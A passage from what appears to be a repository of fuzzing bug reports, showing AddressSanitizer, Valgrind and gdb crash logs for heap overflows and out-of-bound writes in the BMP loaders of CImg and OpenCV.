cimg_library::CImg::load(char const*) ../CImg.h:48122 335 | #3 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 336 | #4 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 337 | #5 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 338 | #6 0x7f9a6f20a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 339 | #7 0x4022f8 in _start (/src/CImg/fuzz-test/bmp-test+0x4022f8) 340 | 341 | 0x60200000eff8 is located 0 bytes to the right of 8-byte region [0x60200000eff0,0x60200000eff8) 342 | allocated by thread T0 here: 343 | #0 0x7f9a6fe026b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) 344 | #1 0x4074fe in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int) ../CImg.h:11379 345 | #2 0x49090a in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int, unsigned char const&) ../CImg.h:11399 346 | #3 0x49090a in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48348 347 | #4 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 348 | #5 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 349 | #6 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 350 | #7 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 351 | #8 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 352 | 353 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../CImg.h:48427 cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 354 | Shadow bytes around the buggy address: 355 | 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 356 | 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 357 | 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 358 | 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 359 | 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 360 | =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 00[fa] 361 | 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 362 | 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 363 | 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 364 | 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 365 | 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 366 | Shadow byte legend (one shadow byte represents 8 application bytes): 367 | Addressable: 00 368 | Partially addressable: 01 02 03 04 05 06 07 369 | Heap left redzone: fa 370 | Heap right redzone: fb 371 | Freed heap region: fd 372 | Stack left redzone: f1 373 | Stack mid redzone: f2 374 | Stack right redzone: f3 375 | Stack partial redzone: f4 376 | Stack after return: f5 377 | Stack use after scope: f8 378 | Global redzone: f9 379 | Global init order: f6 380 | Poisoned by user: f7 381 | Container overflow: fc 382 | Array cookie: ac 383 | Intra object redzone: bb 384 | ASan internal: fe 385 | ==4043==ABORTING 386 | 387 | ``` 388 | 389 | ## 8. cimg-heap-overflow-load_bmp-48378 390 | 391 | A heap overflow occurs in line 48378 in CImg.h when loading the crafted bmp file . 392 | the tested code commit is 8447076ef22322a14a0ce130837e44c5ba8095f4. 393 | 394 | ``` 395 | ================================================================= 396 | ==4044==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eff4 at pc 0x0000004945d0 bp 0x7ffc62183410 sp 0x7ffc62183400 397 | READ of size 1 at 0x60200000eff4 thread T0 398 | #0 0x4945cf in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48378 399 | #1 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 400 | #2 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 401 | #3 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 402 | #4 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 403 | #5 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 404 | #6 0x7f628195382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 405 | #7 0x4022f8 in _start (/src/CImg/fuzz-test/bmp-test+0x4022f8) 406 | 407 | 0x60200000eff4 is located 0 bytes to the right of 4-byte region [0x60200000eff0,0x60200000eff4) 408 | allocated by thread T0 here: 409 | #0 0x7f628254b6b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) 410 | #1 0x40562f in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int) ../CImg.h:11379 411 | #2 0x4907f4 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48342 412 | #3 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 413 | #4 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 414 | #5 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 415 | #6 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 416 | #7 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 417 | 418 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../CImg.h:48378 cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 419 | Shadow bytes around the buggy address: 420 | 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 421 | 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 422 | 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 423 | 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 424 | 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 425 | =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[04]fa 426 | 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 427 | 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 428 | 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 429 | 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 430 | 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 431 | Shadow byte legend (one shadow byte represents 8 application bytes): 432 | Addressable: 00 433 | Partially addressable: 01 02 03 04 05 06 07 434 | Heap left redzone: fa 435 | Heap right redzone: fb 436 | Freed heap region: fd 437 | Stack left redzone: f1 438 | Stack mid redzone: f2 439 | Stack right redzone: f3 440 | Stack partial redzone: f4 441 | Stack after return: f5 442 | Stack use after scope: f8 443 | Global redzone: f9 444 | Global init order: f6 445 | Poisoned by user: f7 446 | Container overflow: fc 447 | Array cookie: ac 448 | Intra object redzone: bb 449 | ASan internal: fe 450 | ==4044==ABORTING 451 | 452 | 453 | ``` 454 | 455 | 456 | -------------------------------------------------------------------------------- /opencv/readme.md: -------------------------------------------------------------------------------- 1 | 2 | bugs of opencv 3 | ================== 4 | ** This work done with 360 TeamSerious ** 5 | 6 | # 1. out-of-bound write in FillColorRow4 7 | 8 | An out of bound write error occurs when reads it by using cv::imread. 9 | 10 | ``` 11 | ==14475== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 12 | ==14475== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 13 | ==14475== Command: ./gtest.elf ../../../fuzz-tests/GaussianBlur-test/out/crashes/id:000001,sig:06,src:000001,op:flip1,pos:21 14 | ==14475== 15 | ==14475== Warning: set address range perms: large range [0x3a044040, 0xfa044c88) (undefined) 16 | ==14475== Invalid write of size 4 17 | ==14475== at 0x514CBC3: FillColorRow4(unsigned char*, unsigned char*, int, PaletteEntry*) (utils.cpp:496) 18 | ==14475== by 0x5169284: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:251) 19 | ==14475== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 20 | ==14475== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 21 | ==14475== by 0x400DFA: main (33_GaussianBlur.cpp:34) 22 | ==14475== Address 0xfffffffff4044c20 is not stack'd, malloc'd or (recently) free'd 23 | ==14475== 24 | ==14475== 25 | ==14475== Process terminating with default action of signal 11 (SIGSEGV) 26 | ==14475== Access not within mapped region at address 0xFFFFFFFFF4044C20 27 | ==14475== at 0x514CBC3: FillColorRow4(unsigned char*, unsigned char*, int, PaletteEntry*) (utils.cpp:496) 28 | ==14475== by 0x5169284: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:251) 29 | ==14475== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 30 | ==14475== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 31 | ==14475== by 0x400DFA: main (33_GaussianBlur.cpp:34) 32 | ==14475== If you believe this happened as a result of a stack 33 | ==14475== overflow in your program's main thread (unlikely but 34 | ==14475== possible), you can try to increase the size of the 35 | ==14475== main thread stack using the --main-stacksize= flag. 36 | ==14475== The main thread stack size used in this run was 8388608. 37 | ==14475== 38 | ==14475== HEAP SUMMARY: 39 | ==14475== in use at exit: 3,238,103,506 bytes in 397 blocks 40 | ==14475== total heap usage: 458 allocs, 61 frees, 3,238,113,514 bytes allocated 41 | ==14475== 42 | ==14475== LEAK SUMMARY: 43 | ==14475== definitely lost: 0 bytes in 0 blocks 44 | ==14475== indirectly lost: 0 bytes in 0 blocks 45 | ==14475== possibly lost: 3,221,236,783 bytes in 114 blocks 46 | ==14475== still reachable: 16,866,723 bytes in 283 blocks 47 | ==14475== suppressed: 0 bytes in 0 blocks 48 | ==14475== Rerun with --leak-check=full to see details of leaked memory 49 | ==14475== 50 | ==14475== For counts of detected and suppressed errors, rerun with: -v 51 | ==14475== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 52 | Segmentation fault 53 | 54 | ``` 55 | 56 | # 2. A heap-based buf overflow results to invalid write in fseek. 57 | 58 | ``` 59 | ==25260== Memcheck, a memory error detector 60 | ==25260== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 61 | ==25260== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 62 | ==25260== Command: ./gtest.elf ../../../fuzz-tests/GaussianBlur-test/out/crashes/id:000002,sig:06,src:000001,op:flip1,pos:47 63 | ==25260== 64 | ==25260== Invalid write of size 2 65 | ==25260== at 0x4C2F7E3: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 66 | ==25260== by 0x5178F29: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:235) 67 | ==25260== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 68 | ==25260== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 69 | ==25260== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 70 | ==25260== by 0x400DFA: main (33_GaussianBlur.cpp:34) 71 | ==25260== Address 0xecb66c0 is 0 bytes after a block of size 1,264 alloc'd 72 | ==25260== at 0x4C2B0E0: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 73 | ==25260== by 0x513AD5C: cv::Ptr cv::makePtr() (ptr.inl.hpp:301) 74 | ==25260== by 0x5167CE3: cv::BmpDecoder::newDecoder() const (grfmt_bmp.cpp:76) 75 | ==25260== by 0x51322DB: cv::findDecoder(cv::String const&) (loadsave.cpp:199) 76 | ==25260== by 0x5134301: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:384) 77 | ==25260== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 78 | ==25260== by 0x400DFA: main (33_GaussianBlur.cpp:34) 79 | ==25260== 80 | ==25260== Source and destination overlap in memcpy(0xecb676a, 0xecb67f0, 632) 81 | ==25260== at 0x4C2F71C: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 82 | ==25260== by 0x5178F29: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:235) 83 | ==25260== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 84 | ==25260== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 85 | ==25260== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 86 | ==25260== by 0x400DFA: main (33_GaussianBlur.cpp:34) 87 | ==25260== 88 | ==25260== Invalid read of size 8 89 | ==25260== at 0x74928F5: fseek (fseek.c:38) 90 | ==25260== by 0x51784A6: cv::RBaseStream::readBlock() (bitstrm.cpp:104) 91 | ==25260== by 0x5178F9E: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:233) 92 | ==25260== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 93 | ==25260== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 94 | ==25260== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 95 | ==25260== by 0x400DFA: main (33_GaussianBlur.cpp:34) 96 | ==25260== Address 0x33333333333303b is not stack'd, malloc'd or (recently) free'd 97 | ==25260== 98 | ==25260== 99 | ==25260== Process terminating with default action of signal 11 (SIGSEGV) 100 | ==25260== General Protection Fault 101 | ==25260== at 0x74928F5: fseek (fseek.c:38) 102 | ==25260== by 0x51784A6: cv::RBaseStream::readBlock() (bitstrm.cpp:104) 103 | ==25260== by 0x5178F9E: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:233) 104 | ==25260== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 105 | ==25260== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 106 | ==25260== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 107 | ==25260== by 0x400DFA: main (33_GaussianBlur.cpp:34) 108 | ==25260== Invalid read of size 8 109 | ==25260== at 0x749CF52: _IO_flush_all_lockp (genops.c:844) 110 | ==25260== by 0x749D0C9: _IO_cleanup (genops.c:1013) 111 | ==25260== by 0x7589DBA: __libc_freeres (in /lib/x86_64-linux-gnu/libc-2.19.so) 112 | ==25260== by 0x4A256BC: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-amd64-linux.so) 113 | ==25260== by 0xFFF0002DF: ??? 114 | ==25260== Address 0x3311110000030018 is not stack'd, malloc'd or (recently) free'd 115 | ==25260== 116 | ==25260== 117 | ==25260== Process terminating with default action of signal 11 (SIGSEGV) 118 | ==25260== General Protection Fault 119 | ==25260== at 0x749CF52: _IO_flush_all_lockp (genops.c:844) 120 | ==25260== by 0x749D0C9: _IO_cleanup (genops.c:1013) 121 | ==25260== by 0x7589DBA: __libc_freeres (in /lib/x86_64-linux-gnu/libc-2.19.so) 122 | ==25260== by 0x4A256BC: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-amd64-linux.so) 123 | ==25260== by 0xFFF0002DF: ??? 124 | ==25260== 125 | ==25260== HEAP SUMMARY: 126 | ==25260== in use at exit: 97,530 bytes in 393 blocks 127 | ==25260== total heap usage: 454 allocs, 61 frees, 107,538 bytes allocated 128 | ==25260== 129 | ==25260== LEAK SUMMARY: 130 | ==25260== definitely lost: 0 bytes in 0 blocks 131 | ==25260== indirectly lost: 0 bytes in 0 blocks 132 | ==25260== possibly lost: 8,167 bytes in 113 blocks 133 | ==25260== still reachable: 89,363 bytes in 280 blocks 134 | ==25260== suppressed: 0 bytes in 0 blocks 135 | ==25260== Rerun with --leak-check=full to see details of leaked memory 136 | ==25260== 137 | ==25260== For counts of detected and suppressed errors, rerun with: -v 138 | ==25260== ERROR SUMMARY: 260 errors from 4 contexts (suppressed: 0 from 0) 139 | Segmentation fault 140 | ``` 141 | 142 | # 3. out-of-bound write in FillColorRow8 143 | 144 | ``` 145 | ==15589== Memcheck, a memory error detector 146 | ==15589== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.==15589== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 147 | ==15589== Command: ./opencv_test.elf ../../../fuzz-tests/medianBlur-test/out/crashes/id:000017,sig:06,src:000083,op:flip1,pos:21 148 | ==15589== 149 | ==15589== Warning: set address range perms: large range [0x3a044040, 0xfa044c88) (undefined)==15589== Invalid write of size 4 150 | ==15589== at 0x514CA25: FillColorRow8(unsigned char*, unsigned char*, int, PaletteEntry*) (utils.cpp:470) 151 | ==15589== by 0x5169A00: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:339) 152 | ==15589== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 153 | ==15589== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 154 | ==15589== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 155 | ==15589== Address 0xfffffffff4044c20 is not stack'd, malloc'd or (recently) free'd 156 | ==15589== 157 | ==15589== 158 | ==15589== Process terminating with default action of signal 11 (SIGSEGV) 159 | ==15589== Access not within mapped region at address 0xFFFFFFFFF4044C20 160 | ==15589== at 0x514CA25: FillColorRow8(unsigned char*, unsigned char*, int, PaletteEntry*) (utils.cpp:470) 161 | ==15589== by 0x5169A00: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:339) 162 | ==15589== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 163 | ==15589== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 164 | ==15589== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 165 | ==15589== If you believe this happened as a result of a stack 166 | ==15589== overflow in your program's main thread (unlikely but 167 | ==15589== possible), you can try to increase the size of the 168 | ==15589== main thread stack using the --main-stacksize= flag. 169 | ==15589== The main thread stack size used in this run was 8388608. 170 | ==15589== 171 | ==15589== HEAP SUMMARY: 172 | ==15589== in use at exit: 3,254,880,734 bytes in 397 blocks 173 | ==15589== total heap usage: 458 allocs, 61 frees, 3,254,890,742 bytes allocated 174 | ==15589== 175 | ==15589== LEAK SUMMARY: 176 | ==15589== definitely lost: 0 bytes in 0 blocks 177 | ==15589== indirectly lost: 0 bytes in 0 blocks 178 | ==15589== possibly lost: 3,221,236,779 bytes in 114 blocks 179 | ==15589== still reachable: 33,643,955 bytes in 283 blocks 180 | ==15589== suppressed: 0 bytes in 0 blocks 181 | ==15589== Rerun with --leak-check=full to see details of leaked memory 182 | ==15589== 183 | ==15589== For counts of detected and suppressed errors, rerun with: -v 184 | ==15589== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 185 | Segmentation fault 186 | 187 | ``` 188 | 189 | # 4. buffer overflow in cv::BmpDecoder::readData (memcpy) 190 | 191 | ``` 192 | Stopped reason: SIGSEGV 193 | [----------------------------------registers-----------------------------------] 194 | RAX: 0xffffffffc0000060 195 | RBX: 0x0 196 | RCX: 0x1850 197 | RDX: 0xffffffffc0000060 198 | RSI: 0x7fffffffd7b0 ('3' ) 199 | RDI: 0x7fe82df73be0 ('3' ) 200 | RBP: 0x7fffffffe310 --> 0x0 201 | RSP: 0x7fffffffd5e8 --> 0x7ffff763e62d (: mov rax,QWORD PTR [rip+0x511044] # 0x7ffff7b4f678 <__gcov0._ZN2cv10BmpDecoder8readDataERNS_3MatE+1176>) 202 | RIP: 0x7ffff54c1ba4 (<__memcpy_sse2_unaligned+372>: movdqu xmm8,XMMWORD PTR [rsi+rcx*1]) 203 | R8 : 0x185 204 | R9 : 0xffffffffc000006 205 | R10: 0x7fffffffd3b0 --> 0x0 206 | R11: 0x7ffff7603320 (: sub rsp,0x8) 207 | R12: 0x400c40 (<_start>: xor ebp,ebp) 208 | R13: 0x7fffffffe3f0 --> 0x2 209 | R14: 0x0 210 | R15: 0x0 211 | EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) 212 | [-------------------------------------code-------------------------------------] 213 | 0x7ffff54c1b99 <__memcpy_sse2_unaligned+361>: je 0x7ffff54c1c32 <__memcpy_sse2_unaligned+514> 214 | 0x7ffff54c1b9f <__memcpy_sse2_unaligned+367>: xor ecx,ecx 215 | 0x7ffff54c1ba1 <__memcpy_sse2_unaligned+369>: xor r8d,r8d 216 | => 0x7ffff54c1ba4 <__memcpy_sse2_unaligned+372>: movdqu xmm8,XMMWORD PTR [rsi+rcx*1] 217 | 0x7ffff54c1baa <__memcpy_sse2_unaligned+378>: add r8,0x1 218 | 0x7ffff54c1bae <__memcpy_sse2_unaligned+382>: movdqu XMMWORD PTR [rdi+rcx*1],xmm8 219 | 0x7ffff54c1bb4 <__memcpy_sse2_unaligned+388>: add rcx,0x10 220 | 0x7ffff54c1bb8 <__memcpy_sse2_unaligned+392>: cmp r9,r8 221 | [------------------------------------stack-------------------------------------] 222 | 0000| 0x7fffffffd5e8 --> 0x7ffff763e62d (: mov rax,QWORD PTR [rip+0x511044] # 0x7ffff7b4f678 <__gcov0._ZN2cv10BmpDecoder8readDataERNS_3MatE+1176>) 223 | 0008| 0x7fffffffd5f0 --> 0x1201204800000001 224 | 0016| 0x7fffffffd5f8 --> 0x7ffff7fe2158 --> 0x7ffff149c000 --> 0x10102464c457f 225 | 0024| 0x7fffffffd600 --> 0x7fffffffe240 --> 0x242ff4010 226 | 0032| 0x7fffffffd608 --> 0x6150a0 --> 0x7ffff7a9ce50 --> 0x7ffff763bb24 (: push rbx) 227 | 0040| 0x7fffffffd610 --> 0x7ffff4de7cb0 --> 0x1 228 | 0048| 0x7fffffffd618 --> 0x1007ffff7de7ea5 229 | 0056| 0x7fffffffd620 --> 0x7ffff7feb4e8 --> 0x7ffff5427000 --> 0x10102464c457f 230 | [------------------------------------------------------------------------------] 231 | Legend: code, data, rodata, value 232 | Stopped reason: SIGSEGV 233 | __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:116 234 | 116 ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory. 235 | gdb-peda$ bt 236 | #0 __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:116 237 | #1 0x00007ffff763e62d in cv::BmpDecoder::readData (this=0x6150a0, img=...) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/grfmt_bmp.cpp:463 238 | #2 0x00007ffff7608a8c in cv::imread_ (filename=..., flags=0x1, hdrtype=0x2, mat=0x7fffffffe240) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/loadsave.cpp:454 239 | #3 0x00007ffff7609742 in cv::imread (filename=..., flags=0x1) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/loadsave.cpp:565 240 | #4 0x0000000000400d91 in main () 241 | #5 0x00007ffff5448f45 in __libc_start_main (main=0x400d2d
, argc=0x2, argv=0x7fffffffe3f8, init=, fini=, rtld_fini=, stack_end=0x7fffffffe3e8) at libc-start.c:287 242 | #6 0x0000000000400c69 in _start () 243 | gdb-peda$ 244 | 245 | ``` 246 | 247 | # 5. out-of-bound write in FillColorRow1 248 | 249 | ``` 250 | ==21776== Memcheck, a memory error detector 251 | ==21776== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 252 | ==21776== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 253 | ==21776== Command: ./opencv_test.elf ../../../fuzz-tests/medianBlur-test/out/crashes/id:000023,sig:06,src:000185,op:ext_AO,pos:23 254 | ==21776== 255 | ==21776== Warning: set address range perms: large range [0x3a044040, 0xe5f690a8) (undefined) 256 | ==21776== Invalid write of size 4 257 | ==21776== at 0x514CED2: FillColorRow1(unsigned char*, unsigned char*, int, PaletteEntry*) (utils.cpp:543) 258 | ==21776== by 0x51690BC: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:236) 259 | ==21776== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 260 | ==21776== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 261 | ==21776== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 262 | ==21776== Address 0xffffffffe5f68fd7 is not stack'd, malloc'd or (recently) free'd 263 | ==21776== 264 | ==21776== 265 | ==21776== Process terminating with default action of signal 11 (SIGSEGV) 266 | ==21776== Access not within mapped region at address 0xFFFFFFFFE5F68FD7 267 | ==21776== at 0x514CED2: FillColorRow1(unsigned char*, unsigned char*, int, PaletteEntry*) (utils.cpp:543) 268 | ==21776== by 0x51690BC: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:236) 269 | ==21776== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 270 | ==21776== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 271 | ==21776== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 272 | ==21776== If you believe this happened as a result of a stack 273 | ==21776== overflow in your program's main thread (unlikely but 274 | ==21776== possible), you can try to increase the size of the 275 | ==21776== main thread stack using the --main-stacksize= flag. 276 | ==21776== The main thread stack size used in this run was 8388608. 277 | ==21776== 278 | ==21776== HEAP SUMMARY: 279 | ==21776== in use at exit: 2,884,881,858 bytes in 396 blocks 280 | ==21776== total heap usage: 457 allocs, 61 frees, 2,884,891,866 bytes allocated 281 | ==21776== 282 | ==21776== LEAK SUMMARY: 283 | ==21776== definitely lost: 0 bytes in 0 blocks 284 | ==21776== indirectly lost: 0 bytes in 0 blocks 285 | ==21776== possibly lost: 2,884,792,399 bytes in 114 blocks 286 | ==21776== still reachable: 89,459 bytes in 282 blocks 287 | ==21776== suppressed: 0 bytes in 0 blocks 288 | ==21776== Rerun with --leak-check=full to see details of leaked memory 289 | ==21776== 290 | ==21776== For counts of detected and suppressed errors, rerun with: -v 291 | ==21776== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 292 | Segmentation fault 293 | 294 | ``` 295 | 296 | # 6. out-of-bound write in readData 297 | 298 | ``` 299 | ==24457== Memcheck, a memory error detector==24457== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 300 | ==24457== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 301 | ==24457== Command: ./opencv_test.elf ../../../fuzz-tests/medianBlur-test/out/crashes/id:000027,sig:06,src:000302,op:flip1,pos:21 302 | ==24457== 303 | ==24457== Warning: set address range perms: large range [0x3a044040, 0xfa0459a8) (undefined) 304 | ==24457== Invalid write of size 1 305 | ==24457== at 0x516949C: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:283) 306 | ==24457== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 307 | ==24457== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 308 | ==24457== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 309 | ==24457== Address 0xfffffffff40458d7 is not stack'd, malloc'd or (recently) free'd 310 | ==24457== 311 | ==24457== 312 | ==24457== Process terminating with default action of signal 11 (SIGSEGV) 313 | ==24457== Access not within mapped region at address 0xFFFFFFFFF40458D7 314 | ==24457== at 0x516949C: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:283) 315 | ==24457== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 316 | ==24457== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 317 | ==24457== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 318 | ==24457== If you believe this happened as a result of a stack 319 | ==24457== overflow in your program's main thread (unlikely but 320 | ==24457== possible), you can try to increase the size of the 321 | ==24457== main thread stack using the --main-stacksize= flag. 322 | ==24457== The main thread stack size used in this run was 8388608. 323 | ==24457== 324 | ==24457== HEAP SUMMARY: 325 | ==24457== in use at exit: 3,238,106,882 bytes in 397 blocks 326 | ==24457== total heap usage: 458 allocs, 61 frees, 3,238,116,890 bytes allocated 327 | ==24457== 328 | ==24457== LEAK SUMMARY: 329 | ==24457== definitely lost: 0 bytes in 0 blocks 330 | ==24457== indirectly lost: 0 bytes in 0 blocks 331 | ==24457== possibly lost: 3,221,240,139 bytes in 114 blocks 332 | ==24457== still reachable: 16,866,743 bytes in 283 blocks 333 | ==24457== suppressed: 0 bytes in 0 blocks 334 | ==24457== Rerun with --leak-check=full to see details of leaked memory 335 | ==24457== 336 | ==24457== For counts of detected and suppressed errors, rerun with: -v 337 | ==24457== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 338 | 